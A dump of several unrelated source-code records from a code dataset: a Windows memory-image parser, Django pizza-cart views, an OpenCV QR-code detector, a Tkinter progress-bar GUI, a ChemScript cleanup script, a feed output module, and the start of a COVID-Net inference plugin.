getEthread(fd):\r\n    ''' Parses 
ETHREAD blocks\r\n        Arguments: open file descriptor\r\n        Returns: nothing\r\n        \r\n    '''\r\n    # find ETHREAD headers\r\n    E_T_HEADER = b'\\x06\\x00\\x70\\x00\\x00\\x00\\x00\\x00'\r\n    print(\"THREAD parent process PIDs\\n\")\r\n    for match in re.finditer(E_T_HEADER, fd.read()):\r\n        fd.seek(match.start())\r\n        try:\r\n            # Move to offset 492 and use struct.unpack to read two bytes at PID offset as variable pid\r\n            fd.seek(491, 1)\r\n            pid = struct.unpack('<H', fd.read(2))[0]\r\n        except struct.error as err: # break out of the loop if the struct read fails.\r\n            break\r\n        print('Parent PID: '+str(pid)+'\\n')\r\n\r\n# Local main for testing...\r\nif __name__ == '__main__':\r\n    # open the file and call the function\r\n    try:\r\n        fi = open('vm.vmem', 'rb')\r\n    except FileNotFoundError:\r\n        print(\"File not found\")\r\n        sys.exit(1)\r\n    fi.seek(0)\r\n    getEprocess(fi)\r\n    fi.seek(0)\r\n    getEthread(fi)\r\n    fi.close()\r\n","sub_path":"Memory Parser/mem_parser.py","file_name":"mem_parser.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453862432","text":"# core/urls.py\n\nfrom django.urls import path\nfrom .views import CreateView, DetailsView, CreateTransactionView, DetailsTransacitonView\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n# (?P<pk>[0-9]+)/\nurlpatterns = [\n\tpath('produto/', CreateView.as_view(), name='create'),\n\tpath('produto/<int:pk>/', DetailsView.as_view(), name='details'),\n\n\tpath('transaction/', CreateTransactionView.as_view(), name='transaction'),\n\tpath('transaction/<int:pk>/', \n\t\tDetailsTransacitonView.as_view(), name='transaction_details'\n\t)\n\n\n]\n\n\nurlpatterns = format_suffix_patterns(urlpatterns)","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"303004762","text":"import curses\nclass control:\n    def raw_input(self, stdscr, r, c, prompt_string):\n        curses.echo()\n        stdscr.addstr(r, c, prompt_string)\n        stdscr.refresh()\n        user_input = stdscr.getstr(r, c + 10, 50)\n        return user_input\n\n\nclass math:\n    def get_middle_line(self, col, string):\n        o = int(col) // 2\n        o -= len(string) // 2\n        return o\n","sub_path":"window/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565807850","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom .models import Pizza, Cart\nfrom django.shortcuts import render, redirect\n\ndef index(request):\n    allPizzas = Pizza.objects.all()\n    cart = Cart.objects.all()\n\n    template = loader.get_template('menu/index.html')\n    context = {\n        'allPizzas': allPizzas,\n        'cart': cart,\n    }\n    return HttpResponse(template.render(context, request))\n\ndef addToCart(request, pizza_id, pizza_size):\n    pizza = Pizza.objects.get(pk=pizza_id)\n    newItem = Cart(pizzaId=pizza, size=pizza_size)\n    newItem.save()\n    return redirect('menu') \n\ndef delete(request):\n    Cart.objects.all().delete() \n    return redirect('menu') ","sub_path":"Django/gitpizza/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652272086","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nfrom cv2 import drawContours\nimport math\nimport numpy 
as np\n\nclass QR():\n def __init__(self, path_file):\n self.path_file = path_file\n self.img = cv2.imread(path_file, cv2.IMREAD_COLOR)\n\n\n # Basado en la siguiente solucion: http://dsynflo.blogspot.com.es/2014/10/opencv-qr-code-detection-and-extraction.html\n def detect_trim(self):\n # Convertimos la imagen a escala de grises\n gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)\n\n # Aplicamos un filtro de media para eliminar ruido\n gray = cv2.blur(gray, (8,8))\n\n #Generacion de gradiante X e Y del filtro sobel para la deteccion de bordes\n gradX = cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=1, dy=0, ksize=-1)\n gradY = cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=0, dy=1, ksize=-1)\n # al restar los valores y hacerle el valor absoulto tenemos una imagen de los filos\n # de la imagen\n gradient = cv2.subtract(gradX, gradY)\n gradient = cv2.convertScaleAbs(gradient)\n\n # blur and threshold the imagen\n blurred = cv2.bilateralFilter(gradient, 9, 75, 75)\n (_, thresh) = cv2.threshold(blurred, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n \n # Aplicacion de operacion closed a la imagen\n # kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 15))\n height, width = thresh.shape[:2]\n rate = (len(thresh)) / 30.\n scale_ratio = rate / width\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,\n (int(scale_ratio * width), \n int(scale_ratio * height)))\n '''\n clahe = cv2.createCLAHE(clipLimit=2)\n thresh = clahe.apply(thresh)\n '''\n # thresh = cv2.GaussianBlur(thresh, (3, 3), 0)\n closed = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n\n closed = cv2.erode(closed, None, iterations=8)\n closed = cv2.dilate(closed, None, iterations=8)\n \n cv2.imshow(\"closed\", closed )\n cv2.waitKey(0)\n cv2.destroyWindow(\"closed\")\n \n # Buscamos todos los contornos\n (_, cnts, _) = cv2.findContours(closed.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\n # Obtenemos el de mayor area\n c = sorted(cnts, key=cv2.contourArea, reverse=True)[0]\n\n # Generamos un rectangulo dado el contorno\n rect = cv2.minAreaRect(c)\n\n # Obtenemos las coordenadas de los cuatro puntos del rectangulo\n box = np.int0(cv2.boxPoints(rect))\n # Obtenemos los puntos de recorte\n x0, x1, y0, y1 = self.recorta(box)\n # Recortamos la imagen\n cropped = self.img[y0:y1, x0:x1]\n\n # Actualizamos la imagen\n self.img = cropped\n\n \n def findAndRectify(self):\n '''\n Funcion que encuentra el barcode en una imagen a traves de contornos y posteriormente realiza su giro y\n correccion a traves de las cuatro esquinas\n :return:\n '''\n\n # Realizamos una copia de la imagen\n img_drawed = self.img.copy()\n\n # Realizamos la binarizacion de la imagen\n (_, binarized) = cv2.threshold(cv2.cvtColor(img_drawed, cv2.COLOR_RGBA2GRAY), 0, 255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n \n # Calculo de contornos, obteniendo tambien la herencia entre ellos\n (_, contours, hierarchy) = cv2.findContours(binarized, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Inicializamos los contornos A, B, C los cuales guardaran los tres patrones de busuqeda\n mark = 0\n A = None\n B = None\n C = None\n # Eliminamos una profundidad a la herencia\n hierarchy = hierarchy[0]\n for i in range(len(contours)):\n # Obtenemos el polinomio aproximado de cada contorno\n approx = cv2.approxPolyDP(contours[i], cv2.arcLength(contours[i], True)*0.02, True)\n # Si es un cuadrilatero, entonces puede ser el patron de alineamiento\n if(len(approx) == 4):\n k = i\n c = 0\n # Procedemos a navegar en los hijos de los contornos, guardnado la profundidad en 'c'\n while hierarchy[k][2] != -1:\n 
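# NOTE: with cv2.RETR_TREE each hierarchy entry is laid out as\n                    # [next, previous, first_child, parent]; following index 2 descends\n                    # into nested child squares, so a depth of 2 or more marks a\n                    # finder pattern.\n                    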
k = hierarchy[k][2]\n c += 1\n # Si la profundidad es mayor de 2, entonces es un patron de alineamiento\n if c >= 2:\n # Asignamos el contorno encontrado a A, B o C en funcion de mark\n if mark == 0: A = i\n elif mark == 1: B = i\n elif mark == 2: C = i\n mark += 1\n\n '''\n # Este codigo permite pintar los contornos donde se contienen los patrones de busqueda\n color = (randint(0, 255), randint(0, 255), randint(0, 255))\n drawContours(img_drawed, contours, i, color, 2)\n '''\n\n # Si mark es 3, entonces hemos encontrado los tres patrones\n if mark == 3:\n # Obtenemos los contornos de cada patorn\n Ac = contours[A]\n Bc = contours[B]\n Cc = contours[C]\n\n # Calculamos el centro geometrico del contorno\n Acenter = self.centerByContour(Ac)\n Bcenter = self.centerByContour(Bc)\n Ccenter = self.centerByContour(Cc)\n\n '''\n # Este codigo permite pintar los centros estimados de los patrones\n cv2.circle(img_drawed, Acenter, 5, (0,0,255), 1)\n cv2.circle(img_drawed, Bcenter, 5, (0,0,255), 1)\n cv2.circle(img_drawed, Ccenter, 5, (0,0,255), 1)\n '''\n\n # Calculamos la distancia entre cada punto\n AB = cv2.norm(Acenter, Bcenter)\n BC = cv2.norm(Bcenter, Ccenter)\n CA = cv2.norm(Ccenter, Acenter)\n\n # Inicializamos los identificadores de patrones\n top = None\n median1 = None\n median2 = None\n\n # Si la distancia AB es mayor, entonces es la hipotenusa, C es el patron top\n if AB > BC and AB > CA:\n top = C\n median1 = A\n median2 = B\n # Si la distancia CA es mayor, entonces es la hipotenusa, B es el patron top\n elif CA > AB and CA > BC:\n top = B\n median1 = A\n median2 = C\n # Si la distancia BC es mayor, entonces es la hipotenusa, A es el patron top\n elif BC > AB and BC > CA:\n top = A\n median1 = B\n median2 = C\n\n '''\n # Pinta el patron top de un color, y los restantes de otro\n drawContours(img_drawed, contours[top], -1, (0,0,255), 2)\n drawContours(img_drawed, contours[median1], -1, (255,0,0), 2)\n drawContours(img_drawed, contours[median2], -1, (255,0,0), 2)\n '''\n\n #Obtenemos de nuevo los centros de cada patron de busqueda\n median1c = self.centerByContour(contours[median1])\n median2c = self.centerByContour(contours[median2])\n topc = self.centerByContour(contours[top])\n\n # Calculamos la distancia que hay desde topc a la recta formada por median1c y median2c\n dist = self.lineEquation(median1c, median2c, topc)\n # Calculamos la pendiente de la recta entre median1c y median2c, asi como un indicador de si es horizontal la recta\n align, slope = self.lineSlope(median1c, median2c)\n\n # Inicializamos los patrones de busqueda, esta vez encontrando cual esta a la derecha y cual esta abajo\n bottom = None\n right = None\n orientation = None\n\n # Si esta completamente alineado la recta\n if align == 0:\n bottom = median1\n right = median2\n # Si la pendiente es negativa y el punto esta por debajo\n elif slope < 0 and dist < 0:\n bottom = median1\n right = median2\n orientation = \"NORTH\"\n # Si la pendiente es positiva y el punto esta por debajo\n elif slope > 0 > dist:\n bottom = median2\n right = median1\n orientation = \"EAST\"\n # Si la pendiente es negativa y el punto esta por encima\n elif slope < 0 < dist:\n bottom = median2\n right = median1\n orientation = \"SOUTH\"\n # Si la pendiente es positiva y el punto esta por encima\n elif slope > 0 < dist:\n bottom = median1\n right = median2\n orientation = \"WEST\"\n\n '''\n # Mostramos los contornos con un color indicador para cada uno: TOP: RED, BOTTOM: BLUE, RIGHT: GREEN\n drawContours(img_drawed, contours[top], -1, (0,0,255), 
2)\n drawContours(img_drawed, contours[bottom], -1, (255,0,0), 2)\n drawContours(img_drawed, contours[right], -1, (0,255,0), 2)\n '''\n \n # Calculamos los polinomios aproximados de los contornos, identificandolos\n top_v = cv2.approxPolyDP(contours[top], cv2.arcLength(contours[top], True)*0.02, True)\n bottom_v = cv2.approxPolyDP(contours[bottom], cv2.arcLength(contours[bottom], True)*0.02, True)\n right_v = cv2.approxPolyDP(contours[right], cv2.arcLength(contours[right], True)*0.02, True)\n\n '''\n # Mostramos los puntos del polinomio aproximado con un color indicando para cada uno: TOP: RED, BOTTOM: BLUE, RIGHT: GREEN\n drawContours(img_drawed, top_v, -1, (0,0,255), 5)\n drawContours(img_drawed, bottom_v, -1, (255,0,0), 5)\n drawContours(img_drawed, right_v, -1, (0,255,0), 5)\n '''\n\n # Ahora queremos calcular la cuarta esquina aproximada. Para ello necesitamos calcular el corte\n # De las rectas que contienen los puntos exteriores del patron derecho y de abajo\n\n # Calculamos los puntos del patron right mas alejados del centro de top\n right_p_lados = self.getVerticesMasAlejados(topc, right_v)\n # Calculamos los puntos del patron bottom ma salejados del centro de top\n bottom_p_lados = self.getVerticesMasAlejados(topc, bottom_v)\n\n # Calculamos la interseccion de las dos rectas dado los 4 puntos\n estimated_corner = self.getCorteDosRectas(right_p_lados[0], right_p_lados[1], bottom_p_lados[0], bottom_p_lados[1])\n\n '''\n # Mostramos la cuarta esquina aproximada\n cv2.circle(img_drawed, tuple(estimated_corner), 3, (0, 0, 255), -1)\n '''\n\n # Obtenemos el centro de bottom\n bottomc = self.centerByContour(contours[bottom])\n # Obtenemos el centro de c\n rightc = self.centerByContour(contours[right])\n\n # Para corregir la imagen, vamos a calcular los puntos externos de cada patron y posteriormente hacer una operacion afin\n\n # Para el punto externo de top, calculamos el punto mas lejano de top desde la cuarta esquina\n p1 = self.getMasAlejado(top_v, estimated_corner)\n # Para el punto externo de bottom, calculamos el punto mas lejano de bottom desde el centro de right\n p2 = self.getMasAlejado(bottom_v, rightc)\n # Para el punto externo de right, calculamos el punto mas lejano de right desde el centro de bottom\n p3 = self.getMasAlejado(right_v, bottomc)\n p4 = estimated_corner\n\n '''\n # Mostramos los cuatro puntos externos por donde se realiza la transformacion afin\n c = np.array([[p1],[p2],[p3],[p4]])\n drawContours(img_drawed, c, -1, (255, 0, 0), 4)\n '''\n\n # Calculamos las filas y columnas de la imagen\n rows, cols, _ = img_drawed.shape\n # Al ser un cuadrado, obtenemos el minimo valor entre ellos para usarlo como tamano\n size = rows if rows < cols else cols\n # Calculamos el factor reductor para que no ocupe toda la imagen\n size = 5*size/6\n # Valor para anadir un margen para tolerar errores en la transformacion afin\n margen = 40\n # Montamos los puntos a usar para la transformacion afin\n puntos1 = np.float32([list(p1), list(p2), list(p3)])\n\n '''\n # Pintamos los puntos que usaremos para la transformacion afin\n drawContours(img_drawed, np.array([[p1],[p2],[p3]]), -1, (255, 0, 0), 4)\n '''\n # Ahora indicamos a donde queremos desplazar los puntos anteriores\n puntos2 = np.float32([[margen,margen],[margen, size],[size,margen]])\n # Montamos la transformacion afin\n M = cv2.getAffineTransform(puntos1, puntos2)\n # Aplicamos la transformacion afin a la imagen, indicando como valor de background el blanco\n img_turned = cv2.warpAffine(img_drawed, M, (cols, rows), 
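# presumably white so the quiet zone around the warped code stays clear\n            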
borderMode=cv2.BORDER_CONSTANT, borderValue=(255,255,255))\n\n\n\n cv2.imshow(\"Imagen sin girar\", img_drawed)\n cv2.waitKey(0)\n cv2.destroyWindow(\"Imagen sin girar\")\n\n cv2.imshow(\"Imagen girada\", img_turned)\n cv2.waitKey(0)\n cv2.destroyWindow(\"Imagen girada\")\n\n def show(self):\n ''' Funcion que muestra la imagen QR almacenada en el objeto '''\n cv2.imshow(\"QR\", self.img )\n cv2.waitKey(0)\n cv2.destroyWindow(\"QR\")\n\n def recorta(self, box):\n '''\n Funcion que devuelve los puntos para recortar dado un box\n :param box:\n :return: (x0, x1, y0, y1)\n '''\n x0 = box[0][0]\n x1 = box[0][0]\n y0 = box[0][0]\n y1 = box[0][0]\n for i in (range(len(box))):\n x0 = min(x0, box[i][0])\n x1 = max(x1, box[i][0])\n y0 = min(y0, box[i][1])\n y1 = max(y1, box[i][1])\n return x0, x1, y0, y1\n\n def lineSlope(self, p1, p2):\n '''\n Funcion que calcula la pendiente de la recta que pasa por los dos puntos, indicando si esta alineado o no\n :param p1:\n :param p2:\n :return: (align, slope)\n '''\n dx = p1[0] - p2[0]\n dy = p1[1] - p2[1]\n if dy != 0:\n return 1, dy/dx\n else:\n return 0, 0.0\n\n def centerByContour(self, c):\n '''\n Funcion que calcula el centro de un contorno\n :param c:\n :return: (x, y)\n '''\n m = cv2.moments(c)\n return int(m['m10'] / m['m00']), \\\n int(m['m01'] / m['m00'])\n\n def lineEquation(self, p1, p2, p3):\n '''\n Funcion que calcula la distancia de p3 hasta la recta P1P2\n :param p1:\n :param p2:\n :param p3:\n :return: distancia\n '''\n a = - (p2[1] - p1[1]) / (p2[0] - p1[0])\n b = 1.0\n c = -a*p1[0] - p1[1]\n return (a*p3[0] + b*p3[1] + c)/math.sqrt(a**2 + b**2)\n\n def getVerticesMasAlejados(self, points, point):\n '''\n Funcion que calcula los dos puntos mas lejanos de points desde point\n :param points:\n :param point:\n :return: ((x1,y1),(x2,y2))\n '''\n distances = {}\n for p in point:\n p = p[0]\n p = tuple(p)\n distances[p] = self.distanciaEuclidea(points, p)\n p1 = max(distances, key=distances.get)\n distances.pop(p1, None)\n p2 = max(distances, key=distances.get)\n return np.array(p1), np.array(p2)\n\n def distanciaEuclidea(self, p1, p2):\n '''\n Metodo que calcula la distancia euclidea entre dos puntos de dimension 2\n :param p1:\n :param p2:\n :return: distanciaEuclieda\n '''\n return math.sqrt((p2[0]-p1[0])**2 + (p2[1] - p1[1])**2)\n\n # http://stackoverflow.com/questions/3252194/numpy-and-line-intersections\n def getCorteDosRectas(self, pa1, pa2, pb1, pb2):\n '''\n Funcion que calcula la coordenada de corte de la recta PA1PA2 con PB1PB2\n :param pa1:\n :param pa2:\n :param pb1:\n :param pb2:\n :return: (x, y)\n '''\n def derp(a):\n b = np.empty_like(a)\n b[0] = -a[1]\n b[1] = a[0]\n return b\n\n da = pa2-pa1\n db = pb2-pb1\n dp = pa1-pb1\n dap = derp(da)\n denom = np.dot(dap, db)\n num = np.dot(dap, dp)\n res = (num / denom.astype(float))*db + pb1\n return [int(round(res[0])), int(round(res[1]))]\n\n '''\n '''\n def getMasAlejado(self, points, reference):\n '''\n Funcion que calcula el punto mas alejado en points desde reference\n :param points:\n :param reference:\n :return: (x, y)\n '''\n distances = {}\n for p in points:\n p = p[0]\n p = tuple(p)\n distances[p] = self.distanciaEuclidea(reference, p)\n return max(distances, key=distances.get)\n","sub_path":"D3/QR.py","file_name":"QR.py","file_ext":"py","file_size_in_byte":17120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293064533","text":"import os\nimport threading\nimport tkinter as tk\nimport tkinter.filedialog\nfrom tkinter 
import ttk\nfrom logic import execute_logic\n\nclass MainFrame(tk.Frame):\n\n def __init__(self, parent, app_title, *args, **kwargs):\n \"\"\"\n メインウィンドウ内のフレームを生成するコンストラクタ\n 下記の処理を実行する\n ・フレームの設定\n ・フレーム内に含まれるヴィジェット(ラベル・ボタンなど)の配置\n\n parameters\n ----------\n parent : tk.Tk\n フレームの親となるメインウィンドウ\n app_title : app_title\n アプリケーションのタイトル(GUIに表示される)\n *args : variable arguments\n Frameオブジェクトの初期化引数\n **kwargs : variable arguments\n Frameオブジェクトの初期化引数\n \"\"\"\n tk.Frame.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n\n # titleラベル\n self.gui_title_label = tk.Label(self,\n text=app_title,\n font=('メイリオ', 32),\n bg='white',\n fg='limegreen')\n # titleラベルの設置(今回はplaceメソッドを使う)\n self.gui_title_label.place(x=80, y=30)\n\n # file entry (ファイルパスの表示部分)\n self.file_path = tk.StringVar()\n self.file_entry = tk.Entry(self,\n textvariable=self.file_path,\n font=('メイリオ', 10),\n width=55,\n bd=3)\n self.file_entry.place(x=80, y=110)\n\n # file選択ボタン\n self.file_button_img = tk.PhotoImage(file='./icons/folder.png')\n self.file_button = tk.Button(self,\n image=self.file_button_img,\n cursor='hand2')\n # ボタンがクリックされた際のコールバック関数をバインド(割り当て)\n self.file_button.bind('', self.file_button_clicked)\n self.file_button.place(x=540, y=107)\n # ツールチップの生成\n self.file_menu_ttp = CreateToolTip(self.file_button, \"入力ファイルを選択\")\n\n # 設定ボタン\n # 今回設定ウィンドウは実装しないので、コールバック関数は設定しない。\n self.setting_button_img = tk.PhotoImage(file='./icons/settings.png')\n self.setting_button = tk.Button(self,\n image=self.setting_button_img,\n cursor='hand2')\n self.setting_button.place(x=585, y=107)\n self.file_menu_ttp = CreateToolTip(self.setting_button, \"設定画面を開く\")\n\n # アプリケーション実行ボタン\n self.execute_button = tk.Button(self,\n text='アプリケーション実行',\n font=('メイリオ', 10),\n relief='raised',\n cursor='hand2',\n fg='limegreen',\n bg='snow',\n highlightbackground='limegreen',\n width=20)\n # マウスホバーで色を変化させる\n self.execute_button.bind('', self.hover_enter)\n self.execute_button.bind('', self.hover_leave)\n self.execute_button.bind('', self.execute_button_clicked)\n self.execute_button.place(x=250, y=160)\n\n\n def file_button_clicked(self, event):\n # xlsまたはxlsx形式のファイルを選択させる\n filetypes = [(\"Excelブック(.xlsx)\",\"*.xlsx\"),\n (\"Excelブック(.xls)\",\".xls\")]\n # ファイル選択ダイアログの初期フォルダ\n initialdir = os.path.abspath(os.path.dirname(__file__))\n path = tk.filedialog.askopenfilename(filetypes=filetypes,\n initialdir=initialdir)\n self.file_path.set(path)\n\n def hover_enter(self, event):\n # (注)mac, linuxではbuttonのbackgroundオプションが働かない\n self.execute_button.configure(fg='snow', bg='limegreen')\n\n def hover_leave(self, event):\n self.execute_button.configure(fg='limegreen', bg='snow')\n\n def execute_button_clicked(self, event):\n # スレッドの開始(GUIの描画更新のため)\n file_path = self.file_path.get()\n # アプリケーションの進捗確認(プログラスバー)ウィンドウの生成\n progress_window = tk.Toplevel(master=self.parent)\n progress_window.geometry('640x200+400+300')\n progress_window.title(\"アプリ実行進捗状況\")\n # MainFrame同様、フレーム内部のヴィジェットとコールバック関数をクラス化\n self.progress_frame = ProgressFrame(progress_window,\n file_path=file_path,\n bg=\"white\")\n self.progress_frame.pack(side=\"top\", fill=\"both\", expand=True)\n # メインロジックの実行\n self.progress_frame.execute_logic()\n progress_window.mainloop()\n\n\nclass ProgressFrame(tk.Frame):\n\n def __init__(self, parent, file_path, *args, **kwargs):\n \"\"\"\n プログレスウィンドウ内のフレームを生成するコンストラクタ\n 下記の処理を実行する\n ・フレームの設定\n ・フレーム内に含まれるヴィジェット(ラベル・ボタンなど)の配置\n\n parameters\n ----------\n parent : tk.Tk\n フレームの親となるメインウィンドウ\n file_path : str\n メインウィンドウで選択されたファイルのパス\n *args : variable 
arguments\n Frameオブジェクトの初期化引数\n **kwargs : variable arguments\n Frameオブジェクトの初期化引数\n \"\"\"\n tk.Frame.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n self.file_path = file_path\n\n # 進捗状況ラベル\n self.progress_message = tk.StringVar()\n self.progress_message.set('アプリケーション実行中...')\n self.progress_label = tk.Label(self,\n font=('メイリオ', 12),\n textvariable=self.progress_message,\n bg='white',\n justify='left')\n self.progress_label.place(x=80, y=30)\n\n # プログレスバー\n # プログレスバーのスタイル設定\n s = ttk.Style()\n s.theme_use('clam')\n s.configure(\"green.Horizontal.TProgressbar\",\n foreground='limegreen',\n background='limegreen')\n # プログレスバーの配置\n self.progress_bar = ttk.Progressbar(self,\n style=\"green.Horizontal.TProgressbar\",\n orient='horizontal',\n length=400,\n mode='determinate')\n self.progress_bar.configure(maximum=100)\n self.progress_bar.place(x=80, y=120)\n\n\n def execute_logic(self):\n \"\"\"\n メインロジックの実行(描画更新のため、別スレッドで実行)\n 選択したファイルのパスと、プログレスバーのオブジェクトを渡す\n \"\"\"\n th = threading.Thread(target=execute_logic,\n args=(self.file_path,\n self.progress_bar,\n self.after_complete_process))\n th.start()\n\n def after_complete_process(self):\n \"\"\"\n メインロジックの終了時に実行する処理\n ここでは、完了メッセージと完了(OK)ボタンの表示を行う。\n \"\"\"\n # メッセージ\n self.progress_message.set('アプリケーションの実行が完了しました')\n # OKボタン\n self.ok_button = tk.Button(self,\n text='OK',\n font=('メイリオ', 10),\n relief='raised',\n cursor='hand2',\n fg='limegreen',\n bg='snow',\n highlightbackground='limegreen',\n width=10)\n self.ok_button.bind('', self.hover_enter)\n self.ok_button.bind('', self.hover_leave)\n self.ok_button.bind('', self.ok_button_clicked)\n self.ok_button.place(x=500, y=30)\n\n def hover_enter(self, event):\n # (注)mac, linuxではbuttonのbackgroundオプションが働かない\n self.ok_button.configure(fg='snow', bg='limegreen')\n\n def hover_leave(self, event):\n self.ok_button.configure(fg='limegreen', bg='snow')\n\n def ok_button_clicked(self, event):\n # progress windowの削除\n self.parent.destroy()\n\nclass CreateToolTip(object):\n\n def __init__(self, widget, text='widget info'):\n \"\"\"\n 引数として与えられたヴィジェットに対して、指定のテキストを\n 適切な位置にツールチップとして配置する。\n また、マウスホバー時とボタン押下時のコールバック関数をバインドし、\n ツールチップとしての機能を実現する。\n\n parameters\n ----------\n widget : \n ツールチップを配置するヴィジェット\n text : str\n ツールチップとして表示するテキスト\n \"\"\"\n self.waittime = 500 # 単位は[ms]\n self.wraplength = 180 # pixels\n self.widget = widget\n self.text = text\n self.widget.bind('', self.enter)\n self.widget.bind('', self.leave)\n self.widget.bind('', self.leave)\n self.id = None\n self.tw = None\n\n def enter(self, event=None):\n self.schedule()\n\n def leave(self, event=None):\n self.unschedule()\n self.hidetip()\n\n def schedule(self):\n self.unschedule()\n self.id = self.widget.after(self.waittime, self.showtip)\n\n def unschedule(self):\n id = self.id\n self.id = None\n if id:\n self.widget.after_cancel(id)\n\n def showtip(self, event=None):\n x = y = 0\n x, y, cx, cy = self.widget.bbox(\"insert\")\n x += self.widget.winfo_rootx() + 25\n y += self.widget.winfo_rooty() + 20\n # トップレベルウィンドウの生成\n self.tw = tk.Toplevel(self.widget)\n # ラベルのみを残し、アプリケーションウィンドウを削除する\n self.tw.wm_overrideredirect(True)\n self.tw.wm_geometry(\"+%d+%d\" % (x, y))\n label = tk.Label(self.tw,\n text=self.text,\n justify='left',\n background='#ffffff',\n relief='solid',\n borderwidth=1,\n wraplength=self.wraplength)\n label.pack(ipadx=1)\n\n def hidetip(self):\n tw = self.tw\n self.tw = None\n if tw:\n 
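# NOTE: self.tw was cleared above before destroying, so a re-entrant\n            # leave() call sees None and cannot destroy the window twice.\n            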
tw.destroy()\n","sub_path":"tkinter_gui.py","file_name":"tkinter_gui.py","file_ext":"py","file_size_in_byte":11869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370264276","text":"# Chemcleaner script - Firmenich Project\n\nfrom sys import *\nfrom os import *\nfrom os.path import *\nfrom ChemScript11 import *\nEnv.setVerbosity(False)\n\nregmol = Mol()\n\nif readfromwebserver == 1:\n regmol.readData(InputBase64)\n regmol.cleanupStructure()\n InputBase64 = regmol.cdx(True)\nelse:\n ## if not passed single molecule (i.e. in Debug mode, read SD file to clean, and generate SD output\n if not exists('Output'):\n mkdir('Output')\n # Make an SD reader object for the output file\n regreader1 = SDFileReader('./Output/Transformed_output.sdf') \n # Make an SD writer\n writer2 = SDFileWriter('./Output/Cleaned_output.sdf', False)\n\n #initialise variables\n regmol = Mol()\n structurenum = 0\n # Read the input SD file\n while regreader1.readNext() != None:\n structurenum += 1 \n regmol = regreader1.current()\n #clean up structure\n regmol.cleanupStructure()\n #status_string = status_string +'RECORD ' + str(structurenum )+ ' CLEANED ' \n writer2.writeMol(regmol)\n regreader1.close()\n writer2.close()\n \n \n","sub_path":"subprojects/Classic/Chem_Reg/ChemScript/CleanScript.py","file_name":"CleanScript.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503256897","text":"# -*- coding: utf-8 -*-\n\nfrom module import Module\nfrom module import ModuleBuilder\n\nclass Output(Module):\n fields = []\n def __init__(self, setting, context=None):\n super(Output, self).__init__(setting, context)\n fields = setting.find('fields')\n if fields is not None:\n for field_setting in fields:\n self.fields.append(self.OutputField(field_setting))\n \n def execute(self, page=0, context=None):\n if self.fields:\n for item in context.items:\n field_names = [x.name for x in self.fields]\n field_names.append('_id') # 如果已经指定_id 则保留\n for field in self.fields:\n try:\n item[field.name] = item[field.name]\n except KeyError:\n item[field.name] = ''\n for key in item.keys():\n if key not in field_names:\n del item[key]\n else:\n for item in context.items:\n for key in item.keys():\n item[key] = item[key]\n pass\n \n class OutputField():\n name = None\n def __init__(self, setting):\n self.name = setting.get('name')\n \nclass OutputBuilder(ModuleBuilder):\n def build(self, module_config, context=None):\n return Output(module_config, context)","sub_path":"feedin/modules/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529069152","text":"import PyCore\nimport PyDataProcess\nimport copy\n# Your imports below\nimport os\nimport cv2\nimport CovidNet_inference\n\n\n# --------------------\n# - Class to handle the process parameters\n# - Inherits PyCore.CProtocolTaskParam from Ikomia API\n# --------------------\nclass CovidNetParam(PyCore.CProtocolTaskParam):\n\n def __init__(self):\n PyCore.CProtocolTaskParam.__init__(self)\n # Place default value initialization here\n self.model_path = os.path.dirname(os.path.realpath(__file__)) + \"/models/covid-net.pb\"\n\n def setParamMap(self, paramMap):\n # Set parameters values from Ikomia application\n # Parameters values are stored as string and accessible like a python dict\n # Example : self.windowSize = 
int(paramMap[\"windowSize\"])\n pass\n\n def getParamMap(self):\n # Send parameters values to Ikomia application\n # Create the specific dict structure (string container)\n paramMap = PyCore.ParamMap()\n # Example : paramMap[\"windowSize\"] = str(self.windowSize)\n return paramMap\n\n\n# --------------------\n# - Class which implements the process\n# - Inherits PyCore.CProtocolTask or derived from Ikomia API\n# --------------------\nclass CovidNetProcess(PyDataProcess.CImageProcess2d):\n\n def __init__(self, name, param):\n PyDataProcess.CImageProcess2d.__init__(self, name)\n # Add graphics output\n self.addOutput(PyCore.CGraphicsOutput())\n # Add numeric output\n self.addOutput(PyCore.CDblFeatureIO())\n\n # Create parameters class\n if param is None:\n self.setParam(CovidNetParam())\n else:\n self.setParam(copy.deepcopy(param))\n\n param = self.getParam()\n self.covid_model = CovidNet_inference.Covidnet(model_path=param.model_path)\n\n # Load class names\n self.class_names = []\n class_names_path = os.path.dirname(os.path.realpath(__file__)) + \"/models/class_names\"\n\n with open(class_names_path) as f:\n for row in 